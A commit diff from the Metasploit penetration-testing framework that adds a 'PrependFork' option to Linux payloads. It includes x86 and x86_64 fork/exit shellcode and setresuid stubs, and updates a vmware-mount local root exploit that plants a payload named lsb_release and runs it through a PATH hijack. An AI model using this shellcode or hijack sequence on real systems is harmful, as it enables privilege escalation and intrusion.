Land #2325, @jlee-r7's Linux PrependFork addition
commit
206b52ea30
|
@ -19,6 +19,13 @@ module Msf::Payload::Linux
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptBool.new('PrependFork',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresuid',
|
||||
[
|
||||
false,
|
||||
|
@ -97,6 +104,17 @@ module Msf::Payload::Linux
|
|||
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
|
@ -197,10 +215,8 @@ module Msf::Payload::Linux
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# Handle all Power/CBEA code here
|
||||
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
|
||||
# Prepend
|
||||
|
||||
|
@ -277,9 +293,21 @@ module Msf::Payload::Linux
|
|||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
end
|
||||
|
||||
if (test_arch.include?(ARCH_X86_64))
|
||||
elsif (test_arch.include?(ARCH_X86_64))
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
# if (fork()) { exit(0); }
|
||||
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\x48\x85\xc0" # test rax,rax #
|
||||
pre << "\x74\x08" # jz 0x08 #
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
|
@ -389,8 +417,8 @@ module Msf::Payload::Linux
|
|||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
|
|
@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -56,8 +57,6 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
# Handled by ghetto hardcoding below.
|
||||
deregister_options("PrependFork")
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -73,22 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||
end
|
||||
|
||||
# Ghetto PrependFork action which is apparently only implemented for
|
||||
# Meterpreter.
|
||||
# XXX Put this in a mixin somewhere
|
||||
# if(fork()) exit(0);
|
||||
# 6A02 push byte +0x2
|
||||
# 58 pop eax
|
||||
# CD80 int 0x80 ; fork
|
||||
# 85C0 test eax,eax
|
||||
# 7406 jz 0xf
|
||||
# 31C0 xor eax,eax
|
||||
# B001 mov al,0x1
|
||||
# CD80 int 0x80 ; exit
|
||||
exe = generate_payload_exe(
|
||||
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
|
||||
)
|
||||
write_file("lsb_release", exe)
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
|
||||
cmd_exec("chmod +x lsb_release")
|
||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||
|
|
|
@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
|
@ -24,7 +24,6 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
|
||||
register_options([
|
||||
OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
|
@ -71,21 +70,6 @@ module Metasploit3
|
|||
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
|
||||
if(datastore['PrependFork'])
|
||||
# fork() / parent does exit()
|
||||
|
||||
# If the target process is threaded, this means the thread
|
||||
# will exit. exit_group() will try to close the process down
|
||||
# completely.. and if we do that, it may not be reaped
|
||||
# correctly.
|
||||
#
|
||||
# Plus, depending on the vuln, we might get multiple shots at
|
||||
# owning a finite amount of threads.
|
||||
|
||||
midstager <<
|
||||
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
||||
end
|
||||
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
Loading…
Reference in New Issue